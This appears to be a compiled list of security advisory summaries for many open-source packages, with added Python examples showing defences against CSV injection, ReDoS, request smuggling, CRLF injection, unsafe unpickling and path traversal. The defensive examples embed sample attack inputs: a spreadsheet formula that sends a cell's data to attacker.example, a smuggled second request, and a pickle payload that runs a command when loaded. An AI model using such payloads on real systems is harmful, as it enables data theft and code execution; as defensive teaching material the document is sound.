Uncontrolled Resource Consumption
url-regex is vulnerable to Regular Expression Denial of Service. An attacker providing a very long string in String.test can cause a Denial of Service.
The October CMS debugbar plugin contains a feature where it will log all requests (and all information pertaining to each request including session data) whenever it is enabled. This presents a problem if the plugin is ever enabled on a system that is open to untrusted users as the potential exists for them to use this feature to view all requests being made to the application and obtain sensitive information …
In OctoberCMS, an attacker can read local files of an October CMS server. The vulnerability is only exploitable by an authenticated backend user with the cms.manage_assets permission. Issue has been patched in Build.
mozjpeg has a heap-based buffer over-read in get_rgb_row() in rdppm.c via a malformed PPM input file.
libjpeg-turbo has a heap-based buffer over-read in get_rgb_row() in rdppm.c via a malformed PPM input file.
Jenkins Play Framework Plugin lets users specify the path to the play command on the Jenkins master for a form validation endpoint, resulting in an OS command injection vulnerability exploitable by users able to store such a file on the Jenkins master.
Apache Ignite uses an embedded database to build its distributed SQL execution engine; that database provides SQL functions which an attacker could use to access the filesystem.
In WatermelonDB (NPM package "@nozbe/watermelondb"), a maliciously crafted record ID can exploit a SQL Injection vulnerability in iOS adapter implementation and cause the app to delete all or selected records from the database, generally causing the app to become unusable. This may happen in apps that don't validate IDs (valid IDs are /^[a-zA-Z0-9_-.]+$/) and use Watermelon Sync or low-level database.adapter.destroyDeletedRecords method. The integrity risk is low due to the fact …
In OctoberCMS (october/october composer package) versions from 1.0.319 and before 1.0.466, any users with the ability to modify any data that could eventually be exported as a CSV file from the ImportExportController could potentially introduce a CSV injection into the data to cause the generated CSV export file to be malicious. This requires attackers to achieve the following before a successful attack can be completed: 1. Have found a vulnerability …
In OctoberCMS (october/october composer package) versions from 1.0.319 and before 1.0.466, a user with the ability to use the import functionality of the ImportExportController behavior can be socially engineered by an attacker to upload a maliciously crafted CSV file which could result in a reflected XSS attack on the user in question Issue has been patched in Build 466 (v1.0.466).
In OctoberCMS, a user with the ability to use the import functionality of the ImportExportController behavior can be socially engineered by an attacker to upload a maliciously crafted CSV file which could result in a reflected XSS attack.
In OctoberCMS (october/october composer package) versions from 1.0.319 and before 1.0.466, an attacker can exploit this vulnerability to read local files of an October CMS server. The vulnerability is only exploitable by an authenticated backend user with the cms.manage_assets permission. Issue has been patched in Build 466 (v1.0.466).
In OctoberCMS, an attacker can delete arbitrary local files of an October CMS server. The vulnerability is only exploitable by an authenticated backend user with the cms.manage_assets permission.
In OctoberCMS, an attacker can upload files to any directory of an October CMS server. The vulnerability is only exploitable by an authenticated backend user with the cms.manage_assets permission.
In OctoberCMS (october/october composer package) versions from 1.0.319 and before 1.0.466, an attacker can exploit this vulnerability to upload jpg, jpeg, bmp, png, webp, gif, ico, css, js, woff, woff2, svg, ttf, eot, json, md, less, sass, scss, xml files to any directory of an October CMS server. The vulnerability is only exploitable by an authenticated backend user with the cms.manage_assets permission. Issue has been patched in Build 466 (v1.0.466).
In OctoberCMS (october/october composer package) versions from 1.0.319 and before 1.0.466, an attacker can exploit this vulnerability to delete arbitrary local files of an October CMS server. The vulnerability is only exploitable by an authenticated backend user with the cms.manage_assets permission. Issue has been patched in Build 466 (v1.0.466).
Jenkins ECharts API Plugin does not escape the parser identifier when rendering charts, resulting in a stored cross-site scripting vulnerability.
Jenkins Script Security Plugin does not correctly escape pending or approved classpath entries on the In-process Script Approval page, resulting in a stored cross-site scripting vulnerability.
Jenkins ECharts API Plugin does not escape the display name of the builds in the trend chart, resulting in a stored cross-site scripting vulnerability.
Jenkins Subversion Partial Release Manager Plugin does not escape the error message for the repository URL field form validation, resulting in a reflected cross-site scripting vulnerability.
Jenkins Compact Columns Plugin displays the unprocessed job description in tooltips, resulting in a stored cross-site scripting vulnerability that can be exploited by users with Job/Configure permission.
Jenkins Selenium Plugin has no CSRF protection for its HTTP endpoints, allowing attackers to perform all administrative actions provided by the plugin.
In OctoberCMS, any users with the ability to modify any data that could eventually be exported as a CSV file from the ImportExportController could potentially introduce a CSV injection into the data to cause the generated CSV export file to be malicious. This requires attackers to achieve the following before a successful attack can be completed: Have found a vulnerability in the victim's spreadsheet software of choice. Control data that …
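The two CSV injection entries above describe data that is harmless in the application but becomes a formula once a spreadsheet opens the export. The following is an added example, not OctoberCMS code, showing the usual defence on the export side: any cell whose first non-blank character is `=`, `+`, `-`, `@`, tab or carriage return gets a leading single quote so the spreadsheet treats it as text, and every cell is quoted so a separator inside a value cannot split a row. The sample rows are constructed.

```python
import csv
import io

# Characters that make common spreadsheet software evaluate a cell as a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def neutralize_cell(value):
    """Prefix a cell that a spreadsheet would interpret as a formula with a
    single quote, which forces text interpretation. Leading whitespace is
    checked as well, since some tools trim it before deciding."""
    s = str(value)
    if s.startswith(FORMULA_TRIGGERS) or s.lstrip().startswith(FORMULA_TRIGGERS):
        return "'" + s
    return s


def export_csv(rows):
    """Write rows as CSV with every cell quoted, so a separator or newline
    inside a value cannot start a new cell or row."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([neutralize_cell(cell) for cell in row])
    return buf.getvalue()


def roundtrip(rows):
    """Parse the export back, to show what a downstream reader receives."""
    return list(csv.reader(io.StringIO(export_csv(rows))))


# Constructed rows: the "note" column is user-controlled data that is later exported.
SAMPLE_ROWS = [
    ["name", "note"],
    ["alice", '=HYPERLINK("http://attacker.example/?"&A1,"click")'],
    ["bob", "  -2+3"],
    ["carol", "@SUM(A1:A2)"],
    ["dave", "plain text, with comma"],
]

if __name__ == "__main__":
    print(export_csv(SAMPLE_ROWS))
```

The quote prefix is visible to the recipient, which is the accepted trade-off; stripping the trigger characters instead would silently alter legitimate data such as negative numbers or phone numbers.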
websocket-extensions ruby module allows Denial of Service (DoS) via Regex Backtracking. The extension parser may take quadratic time when parsing a header containing an unclosed string parameter value whose content is a repeating two-byte sequence of a backslash and some other character. This could be abused by an attacker to conduct Regex Denial Of Service (ReDoS) on a single-threaded server by providing a malicious payload with the Sec-WebSocket-Extensions header.
websocket-extensions npm module allows Denial of Service (DoS) via Regex Backtracking. The extension parser may take quadratic time when parsing a header containing an unclosed string parameter value whose content is a repeating two-byte sequence of a backslash and some other character. This could be abused by an attacker to conduct Regex Denial Of Service (ReDoS) on a single-threaded server by providing a malicious payload with the Sec-WebSocket-Extensions header.
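The quadratic behaviour in the two websocket-extensions entries comes from a regex-based parser backtracking over an unclosed quoted-string full of backslash escapes. As an added example (not the websocket-extensions module's own code), here is a single-pass parser for the Sec-WebSocket-Extensions grammar from RFC 6455 section 9.1 that never backtracks: an unclosed quoted-string is rejected after one left-to-right scan, so the cost stays linear in the header length. The header inputs, including the malicious one, are constructed.

```python
"""Linear-time parser for Sec-WebSocket-Extensions (RFC 6455 section 9.1).

extension-list  = 1#extension
extension       = extension-token *( ";" extension-param )
extension-param = token [ "=" ( token | quoted-string ) ]
"""

TOKEN_CHARS = frozenset(
    "!#$%&'*+-.^_`|~" "0123456789"
    "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
)


class HeaderSyntaxError(ValueError):
    pass


def _skip_ows(s, i):
    while i < len(s) and s[i] in " \t":
        i += 1
    return i


def _read_token(s, i):
    start = i
    while i < len(s) and s[i] in TOKEN_CHARS:
        i += 1
    if start == i:
        raise HeaderSyntaxError(f"expected token at offset {i}")
    return s[start:i], i


def _read_quoted_string(s, i):
    # s[i] is the opening quote; each byte is examined exactly once.
    i += 1
    out = []
    while i < len(s):
        c = s[i]
        if c == "\\":
            if i + 1 >= len(s):
                raise HeaderSyntaxError("dangling backslash in quoted-string")
            out.append(s[i + 1])
            i += 2
        elif c == '"':
            return "".join(out), i + 1
        else:
            out.append(c)
            i += 1
    raise HeaderSyntaxError("unclosed quoted-string")


def parse_extensions(header):
    """Return [(name, {param: value_or_None}), ...] or raise HeaderSyntaxError."""
    result = []
    i = _skip_ows(header, 0)
    while i < len(header):
        name, i = _read_token(header, i)
        params = {}
        i = _skip_ows(header, i)
        while i < len(header) and header[i] == ";":
            i = _skip_ows(header, i + 1)
            key, i = _read_token(header, i)
            i = _skip_ows(header, i)
            value = None
            if i < len(header) and header[i] == "=":
                i = _skip_ows(header, i + 1)
                if i < len(header) and header[i] == '"':
                    value, i = _read_quoted_string(header, i)
                else:
                    value, i = _read_token(header, i)
                i = _skip_ows(header, i)
            params[key] = value
        result.append((name, params))
        if i < len(header):
            if header[i] != ",":
                raise HeaderSyntaxError(f"unexpected {header[i]!r} at offset {i}")
            i = _skip_ows(header, i + 1)
    return result


def malicious_header(n):
    """Constructed payload of the shape described in the advisory: an unclosed
    quoted-string whose content is n repetitions of backslash + one character."""
    return 'permessage-deflate; server_max_window_bits="' + "\\a" * n


if __name__ == "__main__":
    print(parse_extensions('permessage-deflate; client_max_window_bits, x-foo; a="b\\"c"'))
    try:
        parse_extensions(malicious_header(100000))
    except HeaderSyntaxError as e:
        print("rejected:", e)
```

The design point is that every branch advances `i` and nothing is ever re-scanned; that property, rather than a smaller regex, is what rules out the ReDoS.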
By sending a specially crafted packet, an attacker could trigger a Null Pointer Exception resulting in a Denial of Service. This could be sent to the ingress gateway or a sidecar, triggering a null pointer exception which results in a denial of service.
common.php in the Gravity Forms plugin for WordPress can leak hashed passwords because user_pass is not considered a special case for a $current_user->get($property) call.
serialize-javascript allows remote attackers to inject arbitrary code via the function deleteFunctions within index.js.
reel allows Request Smuggling attacks due to incorrect Content-Length and Transfer-Encoding header parsing. It is possible to conduct HTTP request smuggling attacks by sending the Content-Length header twice. Furthermore, invalid Transfer Encoding headers were found to be parsed as valid which could be leveraged for TE:CL smuggling attacks.
snyk-broker is vulnerable to Arbitrary File Read. It allows arbitrary file reads for users with access to Snyk's internal network via directory traversal.
snyk-broker is vulnerable to Information Exposure. It logs private keys if logging level is set to DEBUG.
snyk-broker is vulnerable to Arbitrary File Read. It allows partial file reads for users who have access to Snyk's internal network via patch history from GitHub Commits API.
snyk-broker is vulnerable to Arbitrary File Read. It allows arbitrary file reads for users with access to Snyk's internal network by creating symlinks to match certain paths.
snyk-broker is vulnerable to Arbitrary File Read. It allows arbitrary file reads for users who have access to Snyk's internal network by appending the URL with a fragment identifier and a path e.g., #package.json.
snyk-broker allows arbitrary file reads to users with access to Snyk's internal network for any files ending with the following extensions: .yaml, .yml or json.
An unauthenticated privilege-escalation issue exists in the bbPress plugin for WordPress when New User Registration is enabled.
parser/js/js-scanner.c in JerryScript mishandles errors during certain out-of-memory conditions, as demonstrated by a scanner_reverse_info_list NULL pointer dereference and a scanner_scan_all assertion failure.
node-dns-sync (npm module dns-sync) through 0.2.0 allows execution of arbitrary commands. This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input. This has been fixed in 0.2.1.
An access bypass vulnerability exists when the experimental Workspaces module is enabled. This can be mitigated by disabling the Workspaces module.
In Kaminari, there is a vulnerability that would allow an attacker to inject arbitrary code into pages with pagination links.
JerryScript allows attackers to cause a denial of service (stack consumption) via a proxy operation.
JerryScript allows attackers to cause a denial of service (assertion failure) because a property key query for a Proxy object returns unintended data.
Centreon exposes Session IDs in server responses.
aegir may leak secrets from environment variables in the browser bundle published to npm.
A flaw was found in Undertow, regarding the processing of invalid HTTP requests with large chunk sizes. This flaw allows an attacker to take advantage of HTTP request smuggling.
The bbPress plugin for WordPress has stored XSS in the Forum creation section, resulting in JavaScript execution at wp-admin/edit.php?post_type=forum (aka the Forum listing page) for all users. An administrator can exploit this at the wp-admin/post.php?action=edit URI.
In ActiveSupport, there is potentially unexpected behaviour in the MemCacheStore and RedisCacheStore where, when untrusted user input is written to the cache store using the raw: true parameter, re-reading the result from the cache can evaluate the user input as a Marshalled object instead of plain text. Vulnerable code looks like: data = cache.fetch("demo", raw: true) { untrusted_string } Versions Affected: rails < 5.2.5, rails < 6.0.4 Not affected: Applications …
The knock-knock plugin for Craft CMS suffers from an open redirect flaw.
The knock-knock plugin for Craft CMS may allow a user who injects a specially crafted X-Forwarded-For HTTP header to bypass IP restrictions.
EM-HTTP-Request uses the library eventmachine insecurely, allowing an attacker to perform a man-in-the-middle attack against users of the library. The hostname in a TLS server certificate is not verified.
An issue was discovered in the Image Resizer plugin for Craft CMS. There is stored XSS in the Bulk Resize action.
An issue was discovered in the Image Resizer plugin for Craft CMS. There are CSRF issues with the log-clear controller action.
An exploitable vulnerability exists in the configuration-loading functionality of the jw.util package for Python. When loading a configuration with FromString or FromStream with YAML, one can execute arbitrary Python code, resulting in OS command execution, because safe_load is not used.
Apache Kylin has some RESTful APIs which concatenate an OS command with a user-supplied string, so a user is likely able to execute any OS command without any protection or validation.
Apache CXF ships with an OpenID Connect JWK Keys service, which allows a client to obtain the public keys in JWK format, which can then be used to verify the signature of tokens issued by the service. Typically, the service obtains the public key from a local keystore (JKS/PKCS12) by specifying the path of the keystore and the alias of the keystore entry. This case is not vulnerable. However it …
In GitLab Puma (RubyGem), a client could smuggle a request through a proxy, causing the proxy to send a response back to another unknown client. If the proxy uses persistent connections and the client adds another request in via HTTP pipelining, the proxy may mistake it as the first request's body. Puma, however, would see it as two requests, and when processing the second request, send back a response that …
In GitLab Puma (RubyGem), an attacker could smuggle an HTTP response, by using an invalid transfer-encoding header.
In Puma (RubyGem), an attacker could smuggle an HTTP response, by using an invalid transfer-encoding header.
In Puma (RubyGem), a client could smuggle a request through a proxy, causing the proxy to send a response back to another unknown client. If the proxy uses persistent connections and the client adds another request in via HTTP pipelining, the proxy may mistake it as the first request's body. Puma, however, would see it as two requests, and when processing the second request, send back a response that the …
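The reel, Undertow and Puma entries above are all the same failure: a server and the proxy in front of it disagree about where one request ends, because of a duplicated Content-Length, a Content-Length next to a Transfer-Encoding, a transfer coding that one side treats as invalid and the other accepts, or an unbounded chunk size. The following is an added example, not code from any of those projects, of the strict framing rules (after RFC 7230 section 3.3.3) a server can apply so that ambiguous messages are rejected rather than guessed at. The header inputs are constructed.

```python
import re

KNOWN_CODINGS = {"chunked", "gzip", "deflate", "compress", "identity"}
MAX_CHUNK = 1 << 31  # assumed upper bound for a single chunk, in bytes


class BadRequest(ValueError):
    pass


def parse_headers(raw):
    """Parse header lines (bytes after the request line) into (name, value) pairs.
    Obsolete line folding and malformed field names are rejected outright."""
    headers = []
    for line in raw.split(b"\r\n"):
        if not line:
            continue
        if line[:1] in (b" ", b"\t"):
            raise BadRequest("obsolete line folding is not accepted")
        name, sep, value = line.partition(b":")
        if not sep or not re.fullmatch(rb"[!#$%&'*+\-.^_`|~0-9A-Za-z]+", name):
            raise BadRequest(f"malformed header line {line!r}")
        headers.append((name.decode().lower(), value.strip().decode("latin-1")))
    return headers


def framing(headers):
    """Decide how the body is delimited, or raise BadRequest on ambiguity.
    Returns ("content-length", n), ("chunked", None) or ("none", None)."""
    cls = [v for k, v in headers if k == "content-length"]
    tes = [v for k, v in headers if k == "transfer-encoding"]
    if cls and tes:
        # RFC 7230 lets TE win, but a server behind a proxy is safer refusing.
        raise BadRequest("Content-Length and Transfer-Encoding together")
    if tes:
        codings = [c.strip().lower() for v in tes for c in v.split(",")]
        if any(c not in KNOWN_CODINGS for c in codings):
            raise BadRequest(f"unknown transfer coding {codings!r}")
        if codings[-1] != "chunked" or codings.count("chunked") != 1:
            raise BadRequest("chunked must be the final and only chunked coding")
        return ("chunked", None)
    if cls:
        # Any repetition is refused, even with equal values: the proxy may not agree.
        if len(cls) != 1 or not re.fullmatch(r"[0-9]{1,19}", cls[0]):
            raise BadRequest(f"invalid Content-Length {cls!r}")
        return ("content-length", int(cls[0]))
    return ("none", None)


def parse_chunk_size(line):
    """Parse a chunk-size line ("1A;ext=1" style); reject signs, whitespace,
    prefixes such as 0x, and sizes above MAX_CHUNK."""
    size_part = line.split(b";", 1)[0]
    if not re.fullmatch(rb"[0-9A-Fa-f]{1,8}", size_part):
        raise BadRequest(f"invalid chunk size {line!r}")
    n = int(size_part, 16)
    if n > MAX_CHUNK:
        raise BadRequest("chunk too large")
    return n


if __name__ == "__main__":
    print(framing(parse_headers(b"Host: a\r\nTransfer-Encoding: gzip, chunked\r\n")))
    try:
        framing(parse_headers(b"Content-Length: 5\r\nContent-Length: 5\r\n"))
    except BadRequest as e:
        print("rejected:", e)
```

Rejecting rather than reconciling is the point: the smuggling attack needs two components to pick different interpretations, and a component that refuses every message with more than one plausible interpretation cannot be the second half of that pair.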
A denial of service vulnerability exists when .NET Core or .NET Framework improperly handles web requests.
Centreon allows remote attackers to execute arbitrary OS commands by placing shell metacharacters in RRDdatabase_status_path (found in main.get.php) and then visiting the include/views/graphs/graphStatus/displayServiceStatus.php page.
There is a possible information disclosure issue in Active Resource <v5.1.1 that could allow an attacker to create specially crafted requests to access data in an unexpected way and possibly leak information.
A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory.
A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge (HTML-based).
A denial of service vulnerability exists when ASP.NET Core improperly handles web requests, aka 'ASP.NET Core Denial of Service Vulnerability'.
It is possible to create a SCORM package in such a way that when added to a course, it could be interacted with via web services in order to achieve remote code execution.
Jodd (versions before the fixed release) performs Deserialization of Untrusted JSON Data when setClassMetadataName is set.
HtmlUnit prior to 2.37.0 contains code execution vulnerabilities. HtmlUnit initializes the Rhino engine improperly, hence malicious JavaScript code can execute arbitrary Java code on the application. Moreover, when embedded in an Android application, the Android-specific initialization of the Rhino engine is done in an improper way, hence malicious JavaScript code can execute arbitrary Java code on the application.
The DMS/ECM module in Dolibarr allows users with the 'Setup documents directories' permission to rename uploaded files to have insecure file extensions. This bypasses the .noexe protection mechanism against XSS.
In Gitea, an attacker can trigger a deadlock by initiating a transfer of a repository's ownership from one organization to another.
When using affected versions of Apache Tomcat, if a) an attacker is able to control the contents and name of a file on the server; and b) the server is configured to use the PersistenceManager with a FileStore; and c) the PersistenceManager is configured with sessionAttributeValueClassNameFilter="null" (the default unless a SecurityManager is used) or a sufficiently lax filter to allow the attacker provided object to be deserialized; and …
When using Apache Tomcat, an attacker who is able to control the contents and name of a file on the server can, under the PersistenceManager/FileStore conditions listed in the preceding entry, have an attacker-provided object deserialized by the server.
Versions of jquery prior to 1.9.0 are vulnerable to Cross-Site Scripting. The load method fails to recognize and remove <script> HTML tags that contain a whitespace character, i.e: </script >, which results in the enclosed script logic to be executed. This allows attackers to execute arbitrary JavaScript in a victim's browser.
The DMS/ECM module in Dolibarr renders user-uploaded .html files in the browser when the attachment parameter is removed from the direct download link. Rendering these files directly, may lead to XSS.
An attacker controlling the unescaped part of the URI passed to httplib2.Http.request() could change request headers and body, and send additional hidden requests to the same server. This impacts software that uses httplib2 with a URI constructed by string concatenation, as opposed to proper urllib building with escaping.
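To make the httplib2 entry concrete: when a user-controlled string is concatenated into the request target without escaping, a CR/LF inside it ends the request line early, and whatever follows becomes headers or even a second request on the same connection. The following is an added example, not httplib2's code: a minimal HTTP/1.1 request builder in both the unsafe and the escaped form, plus a splitter that shows how a lenient server would see the resulting byte stream. The host name and the attacker-controlled segment are constructed.

```python
from urllib.parse import quote

HOST = "example.com"  # assumed target host for the constructed requests

# Constructed attacker-controlled "item id": it terminates the request line,
# adds a header, and appends a whole second request after a blank line.
ATTACK = "search HTTP/1.1\r\nX-Injected: yes\r\n\r\nPOST /admin/delete"


def unsafe_request(user_part):
    """Path built by string concatenation, the affected pattern."""
    return f"GET /items/{user_part} HTTP/1.1\r\nHost: {HOST}\r\n\r\n".encode()


def safe_request(user_part):
    """Same request with the user-controlled segment percent-encoded.
    safe='' also encodes '/', '?', ' ', CR and LF, so the value can only ever
    be a single path segment."""
    encoded = quote(user_part, safe="")
    return f"GET /items/{encoded} HTTP/1.1\r\nHost: {HOST}\r\n\r\n".encode()


def parse_stream(raw):
    """Split a raw byte stream into (request_line, headers) tuples the way a
    lenient HTTP/1.1 server would for body-less requests: each message ends
    at the first CRLFCRLF."""
    messages = []
    for chunk in raw.split(b"\r\n\r\n"):
        if not chunk:
            continue
        lines = chunk.split(b"\r\n")
        headers = {}
        for h in lines[1:]:
            k, _, v = h.partition(b":")
            headers[k.strip().lower()] = v.strip()
        messages.append((lines[0], headers))
    return messages


if __name__ == "__main__":
    for line, hdrs in parse_stream(unsafe_request(ATTACK)):
        print("unsafe ->", line, hdrs)
    for line, hdrs in parse_stream(safe_request(ATTACK)):
        print("safe   ->", line, hdrs)
```

The same rule applies to anything that lands in the request target: build the URL with `urllib.parse` (or the client library's own URL helpers) and treat every user-supplied piece as data, never as syntax.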
A flaw was found in resteasy where an improper input validation results in returning an illegal header that integrates into the server's response. This flaw may result in an injection, which leads to unexpected behavior when the HTTP response is constructed.
em-imap uses the library eventmachine insecurely, allowing an attacker to perform a man-in-the-middle attack against users of the library. The hostname in a TLS server certificate is not verified.
jQuery, which is used by the rdoc gem, allows Cross-site Scripting attacks via the load method. The load method fails to recognize and remove <script> HTML tags that contain a whitespace character, i.e., </script >, which results in the enclosed script logic to be executed.
An issue was discovered in GWTUpload: server/UploadServlet.java (the servlet for handling file upload) accepts a delay parameter that causes a thread to sleep. It can be abused to make all of a server's threads sleep, leading to denial of service.
The (1) JpegImagePlugin.py and (2) EpsImagePlugin.py scripts in Python Image Library (PIL) 1.1.7 and earlier and Pillow before 2.3.1 use the names of temporary files on the command line, which makes it easier for local users to conduct symlink attacks by listing the processes.
Dolibarr is vulnerable to XSS.
The kerberos package for Node.js allows arbitrary code execution and privilege escalation. The flaw may be exploited by injecting malicious DLLs, due to incorrect handling of DLL search paths in the kerberos_sspi LoadLibrary() method.
Attackers could trick execa into executing arbitrary binaries. This behaviour is caused by the setting preferLocal=true which makes execa search for locally installed binaries and executes them. This vulnerability is usually only exploitable when using execa on a client-side LOCAL application.
A flaw was discovered in jackson-databind in versions before 2.9.10, 2.8.11.5, and 2.6.7.3, where it would permit polymorphic deserialization of a malicious object using commons-configuration 1 and 2 JNDI classes. An attacker could use this flaw to execute arbitrary code.
FasterXML jackson-databind 2.x before 2.9.10.4, 2.8.11.6, and 2.7.9.7 mishandles the interaction between serialization gadgets and typing, related to com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig (aka ibatis-sqlmap).
FasterXML jackson-databind 2.x before 2.9.10.4, 2.8.11.6, and 2.7.9.7 mishandles the interaction between serialization gadgets and typing, related to br.com.anteros.dbcp.AnterosDBCPConfig (aka anteros-core).
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.aoju.bus.proxy.provider.remoting.RmiProvider (aka bus-proxy).
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.springframework.aop.config.MethodLocatingFactoryBean (aka spring-aop).
FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.openjpa.ee.WASRegistryManagedRuntime (aka openjpa).
A flaw was found in Keycloak where it does not perform the TLS hostname verification while sending emails using the SMTP server. This flaw allows an attacker to perform a man-in-the-middle (MITM) attack.
MISP MISP-maltego incorrectly shares a MISP connection across users in a remote-transform use case.
pandas can unserialize and execute commands from an untrusted file that is passed to the read_pickle() function, if __reduce__ makes an os.system call.
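The pandas entry is the general pickle problem: on load, the unpickler calls whatever callable the producer placed in the stream via `__reduce__`, with whatever arguments. The following is an added example, not pandas' code, using only the standard library. It builds such a stream, shows that loading it runs a command (a harmless invocation of the current Python interpreter stands in for `os.system`), and contrasts that with a restricted unpickler that refuses any global outside an allow-list before any code runs. The payload and the allow-list are constructed for the demonstration.

```python
import io
import pickle
import subprocess
import sys


class Payload:
    """Anything an attacker writes into the file. On load, pickle calls the
    callable returned by __reduce__ with the given arguments; swap
    subprocess.check_output for os.system and the argument for a shell
    command, and the effect is the one the advisory describes."""

    def __reduce__(self):
        cmd = [sys.executable, "-c", "print('executed-by-unpickle')"]
        return (subprocess.check_output, (cmd,))


def build_malicious_pickle():
    # The bytes reference subprocess.check_output, not Payload: the victim
    # never needs this class to exist.
    return pickle.dumps(Payload())


def load_unsafe(data):
    """What read_pickle() amounts to: pickle.loads on untrusted bytes."""
    return pickle.loads(data)


class RestrictedUnpickler(pickle.Unpickler):
    """Resolve only an explicit allow-list of globals; everything else is
    refused in find_class, which runs before the callable is invoked."""
    ALLOWED = {("builtins", "set"), ("builtins", "frozenset"),
               ("collections", "OrderedDict")}

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"forbidden global {module}.{name}")


def load_restricted(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def demo():
    """Return (output of the command the unsafe load executed, whether the
    restricted load refused the same bytes)."""
    data = build_malicious_pickle()
    executed = load_unsafe(data)          # runs the embedded command
    try:
        load_restricted(data)
        blocked = False
    except pickle.UnpicklingError:
        blocked = True
    return executed.decode().strip(), blocked


if __name__ == "__main__":
    print(demo())
```

An allow-list unpickler is a mitigation for data you must accept in pickle form from a semi-trusted source; for genuinely untrusted input the only safe option is a format that carries no code, such as CSV, JSON or Parquet.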
An XSS issue was identified on the Subrion CMS /panel/configuration/general settings page. A remote attacker can inject arbitrary JavaScript code in the v[language_switch] parameter (within multipart/form-data), which is reflected back within a user's browser without proper output encoding.
A Cross-Site Request Forgery (CSRF) vulnerability was discovered in Subrion that allows a remote attacker to remove files on the server without a victim's knowledge, by enticing an authenticated user to visit an attacker's web page. The application fails to validate the CSRF token for a GET request. An attacker can craft a panel/uploads/read.json?cmd=rm URL (removing this token) and send it to the victim.
Lack of output sanitization can lead to the execution of arbitrary shell commands via the logkitty npm package.
Spring Security uses a fixed null initialization vector with CBC Mode in the implementation of the queryable text encryptor. A malicious user with access to the data that has been encrypted using such an encryptor may be able to derive the unencrypted values using a dictionary attack.
In Apache RocketMQ, when the automatic topic creation in the broker is turned on by default, an evil topic like ../../../../topic2020 is sent from rocketmq-client to the broker, a topic folder will be created in the parent directory in brokers, which leads to a directory traversal vulnerability.
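The RocketMQ topic-name entry and the snyk-broker entries earlier (traversal, symlinks that resolve outside the allowed tree, and a `#fragment` appended to an otherwise permitted URL path) are variations of one check done wrong: the name was validated in a different form from the one that reached the filesystem or the upstream. The following is an added example, not code from either project, of doing the check on the resolved form. It assumes a POSIX-style filesystem for the symlink case and a constructed temporary directory.

```python
import os
import shutil
import tempfile
from urllib.parse import unquote


def resolve_inside(base_dir, name):
    """Return the real path of `name` under base_dir, or None if it escapes
    (via '..', an absolute path, or a symlink pointing out of the tree).
    Symlinks are followed before the containment test, not after."""
    if not name or "\x00" in name:
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    try:
        inside = os.path.commonpath([base, candidate]) == base
    except ValueError:  # e.g. different drives on Windows
        inside = False
    return candidate if inside else None


def safe_topic_dir(store_root, topic):
    """A topic (or any name that maps to a directory) must be one plain segment."""
    if topic in ("", ".", "..") or topic != os.path.basename(topic):
        return None
    return resolve_inside(store_root, topic)


def forwardable_path(path):
    """Check the exact string that would be forwarded upstream: refuse fragment
    and query suffixes, backslashes, NULs and any '..' segment after decoding,
    so the allow-list decision and the forwarded bytes cannot diverge."""
    if "#" in path or "?" in path:
        return None
    decoded = unquote(path)
    if "\\" in decoded or "\x00" in decoded or ".." in decoded.split("/"):
        return None
    return decoded


def demo():
    root = tempfile.mkdtemp()
    store = os.path.join(root, "store")
    os.makedirs(store)
    secret = os.path.join(root, "secret.txt")  # constructed file outside the store
    with open(secret, "w") as f:
        f.write("constructed secret outside the store\n")
    try:
        os.symlink(secret, os.path.join(store, "link.yaml"))
        symlink_result = resolve_inside(store, "link.yaml")
    except OSError:  # platform without symlink support: nothing to escape through
        symlink_result = None
    results = {
        "traversal": safe_topic_dir(store, "../../../../topic2020"),
        "plain": safe_topic_dir(store, "topic2020")
                 == os.path.join(os.path.realpath(store), "topic2020"),
        "symlink": symlink_result,
        "fragment": forwardable_path("/repos/acme/app/contents/README.md#package.json"),
        "encoded": forwardable_path("/repos/acme/%2e%2e/%2e%2e/etc/passwd"),
        "clean": forwardable_path("/repos/acme/app/contents/README.md"),
    }
    shutil.rmtree(root)
    return results


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k:10} -> {v}")
```

`commonpath` rather than `startswith` matters: a prefix test would accept `/srv/store-other/x` as being inside `/srv/store`.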
When running a process with an enabled JMXReporter, with a port configured via metrics.reporter.<reporter_name>.port, an attacker with local access to the machine and JMX port can execute a man-in-the-middle attack using a specially crafted request to rebind the JMXRMI registry to one under the attacker's control. This compromises any connection established to the process via JMX, allowing extraction of credentials and any other transferred data.
Apache Ant uses the default temporary directory identified by the Java system property java.io.tmpdir for several tasks and may thus leak sensitive information. The fixcrlf and replaceregexp tasks also copy files from the temporary directory back into the build tree allowing an attacker to inject modified source files into the build process.
Calling unserialize() on malicious user-submitted content can lead to modification of dynamically-determined object attributes and result in triggering deletion of an arbitrary directory in the file system, if it is writable for the web server. It can also trigger message submission via email using the identity of the website (mail relay). Another insecure deserialization vulnerability is required to actually exploit mentioned aspects.
A buffer overflow vulnerability has been found in the baremetal component of Apache CloudStack. The vulnerability is due to the lack of validation of the mac parameter in baremetal virtual router. If you insert an arbitrary shell command into the mac parameter, v-router will process the command.
Apache Camel's JMX is vulnerable to a Rebind Flaw.
It has been discovered that backend user settings (in $BE_USER->uc) are vulnerable to insecure deserialization. In combination with vulnerabilities of third party components, this can lead to remote code execution. A valid backend user account is needed to exploit this vulnerability.
Apache Camel Netty enables Java deserialization by default.
Apache Camel RabbitMQ enables Java deserialization by default.
In Apache ActiveMQ, the webconsole admin GUI is open to XSS, in the view that lists the contents of a queue.
